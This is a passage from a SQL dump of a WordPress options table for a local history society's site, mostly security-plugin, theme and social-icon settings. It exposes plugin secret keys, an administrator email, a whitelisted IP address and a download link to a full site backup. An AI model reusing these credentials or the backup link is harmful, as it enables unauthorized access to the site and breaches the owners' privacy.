5f5d71aa13f97d9bb42f60d747a320f6\";s:7:\"version\";s:7:\"1.4.9.1\";}','yes'),(152,'widget_ai_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(153,'widget_akismet_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(154,'vc_version','5.1.1','yes'),(155,'wpb_js_composer_license_activation_notified','yes','yes'),(160,'301_redirects','a:5:{s:26:\"/bournesoc/5-coulsdon.html\";s:56:\"http://www.bournesociety.org.uk/bournesoc5-coulsdon-html\";s:35:\"/bournesoc/bourne-society-maps.html\";s:65:\"http://www.bournesociety.org.uk/bournesocbourne-society-maps-html\";s:51:\"/bournesoc/27-smitham-railway-station-coulsdon.html\";s:81:\"http://www.bournesociety.org.uk/bournesoc27-smitham-railway-station-coulsdon-html\";s:56:\"/bournesoc/24-smitham-bottom-infants-school-smitham.html\";s:86:\"http://www.bournesociety.org.uk/bournesoc24-smitham-bottom-infants-school-smitham-html\";s:62:\"/bournesoc/images/stories/bsimages/maps/Bainbridge-IGP1962.jpg\";s:88:\"http://www.bournesociety.org.uk/bournesocimagesstoriesbsimagesmapsbainbridge-igp1962-jpg\";}','yes'),(161,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:1:{i:0;i:2;}}','yes'),(168,'aiowpsec_db_version','1.9','yes'),(169,'aio_wp_security_configs','a:93:{s:19:\"aiowps_enable_debug\";s:0:\"\";s:36:\"aiowps_remove_wp_generator_meta_info\";s:0:\"\";s:25:\"aiowps_prevent_hotlinking\";s:0:\"\";s:28:\"aiowps_enable_login_lockdown\";s:1:\"1\";s:28:\"aiowps_allow_unlock_requests\";s:0:\"\";s:25:\"aiowps_max_login_attempts\";i:3;s:24:\"aiowps_retry_time_period\";i:5;s:26:\"aiowps_lockout_time_length\";i:60;s:28:\"aiowps_set_generic_login_msg\";s:0:\"\";s:26:\"aiowps_enable_email_notify\";s:0:\"\";s:20:\"aiowps_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_enable_forced_logout\";s:0:\"\";s:25:\"aiowps_logout_time_period\";s:2:\"60\";s:39:\"aiowps_enable_invalid_username_lockdown\";s:0:\"\";s:43:\"aiowps_instantly_lockout_specific_usernames\";a:0:{}s:32:\"aiowps_unlock_request_secret_key\";s:20:\"7ory4ht7857678xnsqdz\";s:35:\"aiowps_lockdown_enable_whitelisting\";s:0:\"\";s:36:\"aiowps_lockdown_allowed_ip_addresses\";s:0:\"\";s:26:\"aiowps_enable_whitelisting\";s:1:\"1\";s:27:\"aiowps_allowed_ip_addresses\";s:14:\"217.206.184.92\";s:27:\"aiowps_enable_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_custom_login_captcha\";s:0:\"\";s:25:\"aiowps_captcha_secret_key\";s:20:\"si363pmxms3fyr6qek6c\";s:42:\"aiowps_enable_manual_registration_approval\";s:0:\"\";s:39:\"aiowps_enable_registration_page_captcha\";s:0:\"\";s:35:\"aiowps_enable_registration_honeypot\";s:0:\"\";s:27:\"aiowps_enable_random_prefix\";s:0:\"\";s:31:\"aiowps_enable_automated_backups\";s:0:\"\";s:26:\"aiowps_db_backup_frequency\";s:1:\"4\";s:25:\"aiowps_db_backup_interval\";s:1:\"2\";s:26:\"aiowps_backup_files_stored\";s:1:\"2\";s:32:\"aiowps_send_backup_email_address\";s:0:\"\";s:27:\"aiowps_backup_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_disable_file_editing\";s:0:\"\";s:37:\"aiowps_prevent_default_wp_file_access\";s:0:\"\";s:22:\"aiowps_system_log_file\";s:9:\"error_log\";s:26:\"aiowps_enable_blacklisting\";s:0:\"\";s:26:\"aiowps_banned_ip_addresses\";s:0:\"\";s:28:\"aiowps_enable_basic_firewall\";s:1:\"1\";s:31:\"aiowps_enable_pingback_firewall\";s:0:\"\";s:38:\"aiowps_disable_xmlrpc_pingback_methods\";s:0:\"\";s:34:\"aiowps_block_debug_log_file_access\";s:0:\"\";s:26:\"aiowps_disable_index_views\";s:0:\"\";s:30:\"aiowps_disable_trace_and_track\";s:0:\"\";s:28:\"aiowps_forbid_proxy_comments\";s:0:\"\";s:29:\"aiowps_deny_bad_query_strings\";s:0:\"\";s:34:\"aiowps_advanced_char_string_filter\";s:0:\"\";s:25:\"aiowps_enable_5g_firewall\";s:0:\"\";s:25:\"aiowps_enable_6g_firewall\";s:0:\"\";s:26:\"aiowps_enable_custom_rules\";s:0:\"\";s:19:\"aiowps_custom_rules\";s:0:\"\";s:25:\"aiowps_enable_404_logging\";s:0:\"\";s:28:\"aiowps_enable_404_IP_lockout\";s:0:\"\";s:30:\"aiowps_404_lockout_time_length\";s:2:\"60\";s:28:\"aiowps_404_lock_redirect_url\";s:16:\"http://127.0.0.1\";s:31:\"aiowps_enable_rename_login_page\";s:0:\"\";s:28:\"aiowps_enable_login_honeypot\";s:0:\"\";s:43:\"aiowps_enable_brute_force_attack_prevention\";s:0:\"\";s:30:\"aiowps_brute_force_secret_word\";s:0:\"\";s:24:\"aiowps_cookie_brute_test\";s:0:\"\";s:44:\"aiowps_cookie_based_brute_force_redirect_url\";s:16:\"http://127.0.0.1\";s:59:\"aiowps_brute_force_attack_prevention_pw_protected_exception\";s:0:\"\";s:51:\"aiowps_brute_force_attack_prevention_ajax_exception\";s:0:\"\";s:19:\"aiowps_site_lockout\";s:0:\"\";s:23:\"aiowps_site_lockout_msg\";s:0:\"\";s:30:\"aiowps_enable_spambot_blocking\";s:1:\"1\";s:29:\"aiowps_enable_comment_captcha\";s:1:\"1\";s:31:\"aiowps_enable_autoblock_spam_ip\";s:0:\"\";s:33:\"aiowps_spam_ip_min_comments_block\";s:0:\"\";s:32:\"aiowps_enable_automated_fcd_scan\";s:0:\"\";s:25:\"aiowps_fcd_scan_frequency\";s:1:\"4\";s:24:\"aiowps_fcd_scan_interval\";s:1:\"2\";s:28:\"aiowps_fcd_exclude_filetypes\";s:0:\"\";s:24:\"aiowps_fcd_exclude_files\";s:0:\"\";s:26:\"aiowps_send_fcd_scan_email\";s:0:\"\";s:29:\"aiowps_fcd_scan_email_address\";s:32:\"amber.platts@vanillacircus.co.uk\";s:27:\"aiowps_fcds_change_detected\";b:0;s:22:\"aiowps_copy_protection\";s:0:\"\";s:40:\"aiowps_prevent_site_display_inside_frame\";s:0:\"\";s:32:\"aiowps_prevent_users_enumeration\";s:0:\"\";s:28:\"aiowps_block_fake_googlebots\";s:1:\"1\";s:31:\"aiowps_enable_woo_login_captcha\";s:0:\"\";s:34:\"aiowps_enable_woo_register_captcha\";s:0:\"\";s:38:\"aiowps_enable_woo_lostpassword_captcha\";s:0:\"\";s:27:\"aiowps_max_file_upload_size\";s:2:\"10\";s:32:\"aiowps_place_custom_rules_at_top\";s:0:\"\";s:33:\"aiowps_enable_bp_register_captcha\";s:0:\"\";s:35:\"aiowps_enable_bbp_new_topic_captcha\";s:0:\"\";s:42:\"aiowps_disallow_unauthorized_rest_requests\";s:0:\"\";s:25:\"aiowps_ip_retrieve_method\";s:1:\"0\";s:25:\"aiowps_recaptcha_site_key\";s:0:\"\";s:27:\"aiowps_recaptcha_secret_key\";s:0:\"\";s:24:\"aiowps_default_recaptcha\";s:0:\"\";}','yes'),(178,'current_theme','ShootingStar','yes'),(179,'theme_mods_shootingstar','a:7:{i:0;b:0;s:18:\"nav_menu_locations\";a:2:{s:3:\"top\";i:2;s:15:\"main-navigation\";i:4;}s:18:\"custom_css_post_id\";i:-1;s:25:\"shootingstar_header_email\";s:28:\"support@bournesociety.org.uk\";s:25:\"shootingstar_header_phone\";s:13:\"020 8112 2211\";s:25:\"shootingstar_header_skype\";s:13:\"bourne.advice\";s:27:\"shootingstar_header_address\";s:54:\"Cheltenham Road East, Cheltenham, Gloucestershire, GL2\";}','yes'),(180,'theme_switched','','yes'),(3516,'quick-featured-images-settings','a:3:{s:17:\"column_thumb_post\";s:1:\"1\";s:17:\"column_thumb_page\";s:1:\"1\";s:22:\"minimum_role_all_pages\";s:6:\"editor\";}','yes'),(3524,'wpmdr_from_','a:2:{s:4:\"home\";s:1:\"1\";s:11:\"help_notice\";s:1:\"1\";}','yes'),(3525,'wpmdr_css','.entry-meta {display:none !important;}.home .entry-meta { display: none; }.entry-footer {display:none !important;}.home .entry-footer { display: none; }','yes'),(3526,'wpmdr_disable_php','0','yes'),(3527,'wpmdr_disable_css','0','yes'),(3531,'quick-featured-images-defaults','a:0:{}','yes'),(3546,'wpcf7','a:2:{s:7:\"version\";s:5:\"5.0.1\";s:13:\"bulk_validate\";a:4:{s:9:\"timestamp\";i:1507112678;s:7:\"version\";s:3:\"4.9\";s:11:\"count_valid\";i:1;s:13:\"count_invalid\";i:0;}}','yes'),(4821,'akismet_spam_count','3','yes'),(40337,'adding_tags','yes','yes'),(40339,'show_new_notification','yes','yes'),(40340,'show_premium_cumulative_count_notification','yes','yes'),(40341,'sfsi_section1_options','s:378:\"a:10:{s:16:\"sfsi_rss_display\";s:3:\"yes\";s:18:\"sfsi_email_display\";s:3:\"yes\";s:21:\"sfsi_facebook_display\";s:3:\"yes\";s:20:\"sfsi_twitter_display\";s:3:\"yes\";s:19:\"sfsi_google_display\";s:3:\"yes\";s:20:\"sfsi_youtube_display\";s:3:\"yes\";s:22:\"sfsi_pinterest_display\";s:2:\"no\";s:21:\"sfsi_linkedin_display\";s:3:\"yes\";s:22:\"sfsi_instagram_display\";s:2:\"no\";s:17:\"sfsi_custom_files\";s:0:\"\";}\";','yes'),(40342,'sfsi_section2_options','s:1878:\"a:38:{s:12:\"sfsi_rss_url\";s:36:\"http://www.bournesociety.org.uk/feed\";s:17:\"sfsi_rss_blogName\";s:0:\"\";s:18:\"sfsi_rss_blogEmail\";s:0:\"\";s:14:\"sfsi_rss_icons\";s:5:\"email\";s:14:\"sfsi_email_url\";s:297:\"http://www.specificfeeds.com/widgets/emailSubscribeEncFeed/VW54WDhYbm5rcFVLdW1WdUlvbnlzczlYQ0hzbHNjdkNCVnNrMkR6NlMrR3dCL2FGVzgvcEczLzFXVCtCcElYMC9vQUxJamRRU3daWEw5ZVIyc3pQZGZyS2hOdnhaYWRSR2gxcnYzN0tTNlJPSGdzK01QVFJWQmswc3p0ajRPS2l8bHdPSW5ndmlLUnNYQmxZUC9mQTRINnI3dnp4a3R2aldLUjFnMWcrMTY0Yz0=/OA==/\";s:24:\"sfsi_facebookPage_option\";s:2:\"no\";s:21:\"sfsi_facebookPage_url\";s:0:\"\";s:24:\"sfsi_facebookLike_option\";s:3:\"yes\";s:25:\"sfsi_facebookShare_option\";s:3:\"yes\";s:21:\"sfsi_twitter_followme\";s:2:\"no\";s:27:\"sfsi_twitter_followUserName\";s:0:\"\";s:22:\"sfsi_twitter_aboutPage\";s:3:\"yes\";s:17:\"sfsi_twitter_page\";s:2:\"no\";s:20:\"sfsi_twitter_pageURL\";s:0:\"\";s:26:\"sfsi_twitter_aboutPageText\";s:82:\"Hey, check out this cool site I found: www.yourname.com #Topic via@my_twitter_name\";s:16:\"sfsi_google_page\";s:2:\"no\";s:19:\"sfsi_google_pageURL\";s:0:\"\";s:22:\"sfsi_googleLike_option\";s:3:\"yes\";s:23:\"sfsi_googleShare_option\";s:3:\"yes\";s:20:\"sfsi_youtube_pageUrl\";s:43:\"https://www.youtube.com/watch?v=7zeeWQ7wHps\";s:17:\"sfsi_youtube_page\";s:3:\"yes\";s:19:\"sfsi_youtube_follow\";s:2:\"no\";s:24:\"sfsi_youtubeusernameorid\";s:0:\"\";s:15:\"sfsi_ytube_user\";s:0:\"\";s:17:\"sfsi_ytube_chnlid\";s:0:\"\";s:19:\"sfsi_pinterest_page\";s:0:\"\";s:22:\"sfsi_pinterest_pageUrl\";s:0:\"\";s:23:\"sfsi_pinterest_pingBlog\";s:0:\"\";s:22:\"sfsi_instagram_pageUrl\";s:0:\"\";s:18:\"sfsi_linkedin_page\";s:2:\"no\";s:21:\"sfsi_linkedin_pageURL\";s:0:\"\";s:20:\"sfsi_linkedin_follow\";s:2:\"no\";s:27:\"sfsi_linkedin_followCompany\";i:0;s:23:\"sfsi_linkedin_SharePage\";s:3:\"yes\";s:30:\"sfsi_linkedin_recommendBusines\";s:2:\"no\";s:30:\"sfsi_linkedin_recommendCompany\";s:0:\"\";s:32:\"sfsi_linkedin_recommendProductId\";i:0;s:21:\"sfsi_CustomIcon_links\";s:0:\"\";}\";','yes'),(40343,'sfsi_section3_options','s:272:\"a:7:{s:14:\"sfsi_mouseOver\";s:2:\"no\";s:21:\"sfsi_mouseOver_effect\";s:7:\"fade_in\";s:18:\"sfsi_shuffle_icons\";s:2:\"no\";s:22:\"sfsi_shuffle_Firstload\";s:2:\"no\";s:21:\"sfsi_shuffle_interval\";s:2:\"no\";s:25:\"sfsi_shuffle_intervalTime\";s:0:\"\";s:18:\"sfsi_actvite_theme\";s:7:\"default\";}\";','yes'),(40344,'sfsi_section4_options','s:1700:\"a:43:{s:19:\"sfsi_display_counts\";s:2:\"no\";s:24:\"sfsi_email_countsDisplay\";s:2:\"no\";s:21:\"sfsi_email_countsFrom\";s:6:\"source\";s:23:\"sfsi_email_manualCounts\";s:2:\"20\";s:22:\"sfsi_rss_countsDisplay\";s:2:\"no\";s:21:\"sfsi_rss_manualCounts\";s:2:\"20\";s:22:\"sfsi_facebook_PageLink\";s:0:\"\";s:27:\"sfsi_facebook_countsDisplay\";s:2:\"no\";s:24:\"sfsi_facebook_countsFrom\";s:6:\"manual\";s:26:\"sfsi_facebook_manualCounts\";s:2:\"20\";s:26:\"sfsi_twitter_countsDisplay\";s:2:\"no\";s:23:\"sfsi_twitter_countsFrom\";s:6:\"manual\";s:25:\"sfsi_twitter_manualCounts\";s:2:\"20\";s:19:\"sfsi_google_api_key\";s:0:\"\";s:25:\"sfsi_google_countsDisplay\";s:2:\"no\";s:22:\"sfsi_google_countsFrom\";s:6:\"manual\";s:24:\"sfsi_google_manualCounts\";s:2:\"20\";s:27:\"sfsi_linkedIn_countsDisplay\";s:2:\"no\";s:24:\"sfsi_linkedIn_countsFrom\";s:6:\"manual\";s:26:\"sfsi_linkedIn_manualCounts\";s:2:\"20\";s:10:\"ln_api_key\";s:0:\"\";s:13:\"ln_secret_key\";s:0:\"\";s:19:\"ln_oAuth_user_token\";s:0:\"\";s:10:\"ln_company\";s:0:\"\";s:24:\"sfsi_youtubeusernameorid\";s:4:\"name\";s:17:\"sfsi_youtube_user\";s:0:\"\";s:22:\"sfsi_youtube_channelId\";s:0:\"\";s:17:\"sfsi_ytube_chnlid\";s:0:\"\";s:26:\"sfsi_youtube_countsDisplay\";s:2:\"no\";s:23:\"sfsi_youtube_countsFrom\";s:6:\"manual\";s:25:\"sfsi_youtube_manualCounts\";s:2:\"20\";s:28:\"sfsi_pinterest_countsDisplay\";s:2:\"no\";s:25:\"sfsi_pinterest_countsFrom\";s:6:\"manual\";s:27:\"sfsi_pinterest_manualCounts\";s:2:\"20\";s:19:\"sfsi_pinterest_user\";s:0:\"\";s:20:\"sfsi_pinterest_board\";s:0:\"\";s:25:\"sfsi_instagram_countsFrom\";s:6:\"manual\";s:28:\"sfsi_instagram_countsDisplay\";s:2:\"no\";s:27:\"sfsi_instagram_manualCounts\";s:2:\"20\";s:19:\"sfsi_instagram_User\";s:0:\"\";s:23:\"sfsi_instagram_clientid\";s:0:\"\";s:21:\"sfsi_instagram_appurl\";s:0:\"\";s:20:\"sfsi_instagram_token\";s:0:\"\";}\";','yes'),(40345,'sfsi_section5_options','s:1214:\"a:29:{s:15:\"sfsi_icons_size\";s:2:\"40\";s:18:\"sfsi_icons_spacing\";s:1:\"5\";s:20:\"sfsi_icons_Alignment\";s:4:\"left\";s:17:\"sfsi_icons_perRow\";s:1:\"5\";s:24:\"sfsi_icons_ClickPageOpen\";s:3:\"yes\";s:26:\"sfsi_icons_suppress_errors\";s:2:\"no\";s:16:\"sfsi_icons_stick\";s:2:\"no\";s:18:\"sfsi_rssIcon_order\";s:1:\"1\";s:20:\"sfsi_emailIcon_order\";s:1:\"2\";s:23:\"sfsi_facebookIcon_order\";s:1:\"3\";s:21:\"sfsi_googleIcon_order\";s:1:\"4\";s:22:\"sfsi_twitterIcon_order\";s:1:\"5\";s:22:\"sfsi_youtubeIcon_order\";s:1:\"7\";s:24:\"sfsi_pinterestIcon_order\";s:1:\"8\";s:23:\"sfsi_linkedinIcon_order\";s:1:\"9\";s:24:\"sfsi_instagramIcon_order\";s:2:\"10\";s:22:\"sfsi_CustomIcons_order\";s:0:\"\";s:22:\"sfsi_rss_MouseOverText\";s:3:\"RSS\";s:24:\"sfsi_email_MouseOverText\";s:15:\"Follow by Email\";s:26:\"sfsi_twitter_MouseOverText\";s:7:\"Twitter\";s:27:\"sfsi_facebook_MouseOverText\";s:8:\"Facebook\";s:25:\"sfsi_google_MouseOverText\";s:7:\"Google+\";s:27:\"sfsi_linkedIn_MouseOverText\";s:8:\"LinkedIn\";s:28:\"sfsi_pinterest_MouseOverText\";s:9:\"Pinterest\";s:28:\"sfsi_instagram_MouseOverText\";s:9:\"Instagram\";s:26:\"sfsi_youtube_MouseOverText\";s:7:\"YouTube\";s:26:\"sfsi_custom_MouseOverTexts\";s:0:\"\";s:23:\"sfsi_custom_social_hide\";s:2:\"no\";s:32:\"sfsi_pplus_icons_suppress_errors\";s:2:\"no\";}\";','yes'),(40346,'sfsi_section6_options','s:523:\"a:14:{s:17:\"sfsi_show_Onposts\";s:2:\"no\";s:18:\"sfsi_show_Onbottom\";s:2:\"no\";s:22:\"sfsi_icons_postPositon\";s:6:\"source\";s:20:\"sfsi_icons_alignment\";s:12:\"center-right\";s:22:\"sfsi_rss_countsDisplay\";s:2:\"no\";s:20:\"sfsi_textBefor_icons\";s:26:\"Please follow and like us:\";s:24:\"sfsi_icons_DisplayCounts\";s:2:\"no\";s:12:\"sfsi_rectsub\";s:3:\"yes\";s:11:\"sfsi_rectfb\";s:3:\"yes\";s:11:\"sfsi_rectgp\";s:3:\"yes\";s:12:\"sfsi_rectshr\";s:2:\"no\";s:13:\"sfsi_recttwtr\";s:3:\"yes\";s:14:\"sfsi_rectpinit\";s:3:\"yes\";s:16:\"sfsi_rectfbshare\";s:3:\"yes\";}\";','yes'),(40347,'sfsi_section7_options','s:666:\"a:15:{s:15:\"sfsi_show_popup\";s:2:\"no\";s:15:\"sfsi_popup_text\";s:42:\"Enjoy this blog? Please spread the word :)\";s:27:\"sfsi_popup_background_color\";s:7:\"#eff7f7\";s:23:\"sfsi_popup_border_color\";s:7:\"#f3faf2\";s:27:\"sfsi_popup_border_thickness\";s:1:\"1\";s:24:\"sfsi_popup_border_shadow\";s:3:\"yes\";s:15:\"sfsi_popup_font\";s:26:\"Helvetica,Arial,sans-serif\";s:19:\"sfsi_popup_fontSize\";s:2:\"30\";s:20:\"sfsi_popup_fontStyle\";s:6:\"normal\";s:20:\"sfsi_popup_fontColor\";s:7:\"#000000\";s:17:\"sfsi_Show_popupOn\";s:4:\"none\";s:25:\"sfsi_Show_popupOn_PageIDs\";s:0:\"\";s:14:\"sfsi_Shown_pop\";s:8:\"ETscroll\";s:24:\"sfsi_Shown_popupOnceTime\";s:0:\"\";s:32:\"sfsi_Shown_popuplimitPerUserTime\";s:0:\"\";}\";','yes'),(40348,'sfsi_section8_options','s:1208:\"a:26:{s:20:\"sfsi_form_adjustment\";s:3:\"yes\";s:16:\"sfsi_form_height\";s:3:\"180\";s:15:\"sfsi_form_width\";s:3:\"230\";s:16:\"sfsi_form_border\";s:2:\"no\";s:26:\"sfsi_form_border_thickness\";s:1:\"1\";s:22:\"sfsi_form_border_color\";s:7:\"#b5b5b5\";s:20:\"sfsi_form_background\";s:7:\"#ffffff\";s:22:\"sfsi_form_heading_text\";s:22:\"Get new posts by email\";s:22:\"sfsi_form_heading_font\";s:26:\"Helvetica,Arial,sans-serif\";s:27:\"sfsi_form_heading_fontstyle\";s:4:\"bold\";s:27:\"sfsi_form_heading_fontcolor\";s:7:\"#000000\";s:26:\"sfsi_form_heading_fontsize\";s:2:\"16\";s:27:\"sfsi_form_heading_fontalign\";s:6:\"center\";s:20:\"sfsi_form_field_text\";s:9:\"Subscribe\";s:20:\"sfsi_form_field_font\";s:26:\"Helvetica,Arial,sans-serif\";s:25:\"sfsi_form_field_fontstyle\";s:6:\"normal\";s:25:\"sfsi_form_field_fontcolor\";s:7:\"#000000\";s:24:\"sfsi_form_field_fontsize\";s:2:\"14\";s:25:\"sfsi_form_field_fontalign\";s:6:\"center\";s:21:\"sfsi_form_button_text\";s:9:\"Subscribe\";s:21:\"sfsi_form_button_font\";s:26:\"Helvetica,Arial,sans-serif\";s:26:\"sfsi_form_button_fontstyle\";s:4:\"bold\";s:26:\"sfsi_form_button_fontcolor\";s:7:\"#000000\";s:25:\"sfsi_form_button_fontsize\";s:2:\"16\";s:26:\"sfsi_form_button_fontalign\";s:6:\"center\";s:27:\"sfsi_form_button_background\";s:7:\"#dedede\";}\";','yes'),(40349,'sfsi_section9_options','s:420:\"a:10:{s:20:\"sfsi_show_via_widget\";s:2:\"no\";s:16:\"sfsi_icons_float\";s:2:\"no\";s:24:\"sfsi_icons_floatPosition\";s:12:\"center-right\";s:26:\"sfsi_icons_floatMargin_top\";s:0:\"\";s:29:\"sfsi_icons_floatMargin_bottom\";s:0:\"\";s:27:\"sfsi_icons_floatMargin_left\";s:0:\"\";s:28:\"sfsi_icons_floatMargin_right\";s:0:\"\";s:23:\"sfsi_disable_floaticons\";s:2:\"no\";s:23:\"sfsi_show_via_shortcode\";s:2:\"no\";s:24:\"sfsi_show_via_afterposts\";s:2:\"no\";}\";','yes'),(40350,'sfsi_feed_id','VW54WDhYbm5rcFVLdW1WdUlvbnlzczlYQ0hzbHNjdkNCVnNrMkR6NlMrR3dCL2FGVzgvcEczLzFXVCtCcElYMC9vQUxJamRRU3daWEw5ZVIyc3pQZGZyS2hOdnhaYWRSR2gxcnYzN0tTNlJPSGdzK01QVFJWQmswc3p0ajRPS2l8bHdPSW5ndmlLUnNYQmxZUC9mQTRINnI3dnp4a3R2aldLUjFnMWcrMTY0Yz0=','yes'),(40351,'sfsi_redirect_url','http://www.specificfeeds.com/widgets/emailSubscribeEncFeed/VW54WDhYbm5rcFVLdW1WdUlvbnlzczlYQ0hzbHNjdkNCVnNrMkR6NlMrR3dCL2FGVzgvcEczLzFXVCtCcElYMC9vQUxJamRRU3daWEw5ZVIyc3pQZGZyS2hOdnhaYWRSR2gxcnYzN0tTNlJPSGdzK01QVFJWQmswc3p0ajRPS2l8bHdPSW5ndmlLUnNYQmxZUC9mQTRINnI3dnp4a3R2aldLUjFnMWcrMTY0Yz0=/OA==/','yes'),(40352,'sfsi_installDate','2018-07-27 12:16:10','yes'),(40353,'sfsi_RatingDiv','no','yes'),(40354,'sfsi_footer_sec','no','yes'),(40355,'sfsi_activate','0','yes'),(40356,'sfsi_instagram_sf_count','s:93:\"a:3:{s:4:\"date\";i:1532649600;s:13:\"sfsi_sf_count\";s:0:\"\";s:20:\"sfsi_instagram_count\";s:0:\"\";}\";','yes'),(40357,'sfsi_error_reporting_notice_dismissed','1','yes'),(40358,'widget_sfsi-widget','a:2:{s:12:\"_multiwidget\";i:1;i:3;a:2:{s:5:\"showf\";i:0;s:5:\"title\";s:11:\"Our Socials\";}}','yes'),(40359,'widget_subscriber_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(40360,'sfsi_pluginVersion','2.03','yes'),(40361,'sfsi_serverphpVersionnotification','yes','yes'),(40362,'show_premium_notification','yes','yes'),(40363,'show_notification','yes','yes'),(40364,'show_mobile_notification','yes','yes'),(40365,'sfsi_languageNotice','yes','yes'),(40366,'sfsi_pplus_error_reporting_notice_dismissed','1','yes'),(40367,'sfsi_addThis_icon_removal_notice_dismissed','1','yes'),(40368,'sfsi_verificatiom_code','7Qg3PALSs9PmUHwvY5Aa','yes'),(54623,'category_children','a:0:{}','yes'),(107473,'ai1wm_secret_key','jEI3xWQ03FHp','yes'),(107474,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:357:\"<a href=\"http://www.bournesociety.org.uk/wp-content/ai1wm-backups/www.bournesociety.org.uk-20201008-102400-a2suzv.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.bournesociety.org.uk\" download=\"www.bournesociety.org.uk-20201008-102400-a2suzv.wpress\"><span>Download www.bournesociety.org.uk</span><em>Size: 159 MB</em></a>\";}','yes'),(107485,'ai1wm_updater','a:0:{}','yes'),(152355,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(158405,'wordfence_ls_version','1.0.6','yes'),(158406,'wfls_last_role_change','1624357208','no'),(158407,'wordfence_version','7.5.4','yes'),(158408,'wordfence_case','1','yes'),(158409,'wordfence_installed','1','yes'),(158410,'wordfenceActivated','1','yes'),(158411,'active_plugins','a:2:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:23:\"wordfence/wordfence.php\";}','yes'),(158412,'wf_plugin_act_error','','yes'),(158421,'_cerber_db_errors','a:7:{i:0;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624621040.448936;}i:1;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624621040.463593;}i:2;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624621040.463705;}i:3;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624621040.463813;}i:4;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624621040.463917;}i:5;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624621040.464022;}i:6;a:3:{i:0;s:55:\"Table \'bournesocietyorguk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"cerber_admin_wide\",0,\"\",0)\";i:2;d:1624621040.464096;}}','no'),(158422,'cerber-main','a:38:{s:9:\"boot-mode\";i:0;s:8:\"attempts\";i:5;s:6:\"period\";i:30;s:7:\"lockout\";i:60;s:8:\"agperiod\";i:24;s:7:\"aglocks\";i:2;s:6:\"aglast\";i:4;s:10:\"limitwhite\";i:0;s:11:\"nologinhint\";i:0;s:15:\"nologinhint_msg\";s:0:\"\";s:10:\"nopasshint\";i:0;s:14:\"nopasshint_msg\";s:0:\"\";s:5:\"proxy\";i:0;s:10:\"cookiepref\";s:0:\"\";s:6:\"subnet\";i:0;s:8:\"nonusers\";i:0;s:7:\"wplogin\";i:0;s:10:\"noredirect\";i:0;s:7:\"page404\";s:0:\"\";s:9:\"loginpath\";s:0:\"\";s:9:\"loginnowp\";i:0;s:13:\"logindeferred\";i:0;s:10:\"citadel_on\";s:1:\"1\";s:7:\"cilimit\";i:200;s:8:\"ciperiod\";i:15;s:10:\"ciduration\";i:60;s:8:\"cinotify\";s:0:\"\";s:7:\"keeplog\";i:30;s:12:\"keeplog_auth\";i:30;s:8:\"ip_extra\";s:0:\"\";s:9:\"cerberlab\";i:0;s:11:\"cerberproto\";i:0;s:7:\"usefile\";i:0;s:10:\"dateformat\";s:0:\"\";s:10:\"plain_date\";i:0;s:10:\"admin_lang\";i:0;s:14:\"top_admin_menu\";i:0;s:14:\"no_white_my_ip\";i:0;}','no'),(158423,'cerber-hardening','a:14:{s:8:\"stopenum\";s:0:\"\";s:15:\"stopenum_oembed\";s:0:\"\";s:16:\"stopenum_sitemap\";i:0;s:8:\"adminphp\";i:0;s:8:\"phpnoupl\";i:0;s:8:\"nophperr\";s:0:\"\";s:6:\"xmlrpc\";i:0;s:7:\"nofeeds\";i:0;s:10:\"norestuser\";s:0:\"\";s:6:\"norest\";i:0;s:8:\"restauth\";s:0:\"\";s:9:\"restroles\";a:1:{i:0;s:13:\"administrator\";}s:9:\"restwhite\";a:2:{i:0;s:6:\"oembed\";i:1;s:14:\"wp-site-health\";}s:9:\"cleanhead\";s:0:\"\";}','no'),(158424,'cerber-users','a:19:{s:8:\"authonly\";i:0;s:11:\"authonlyacl\";i:0;s:11:\"authonlymsg\";s:68:\"Only registered and logged in users are allowed to view this 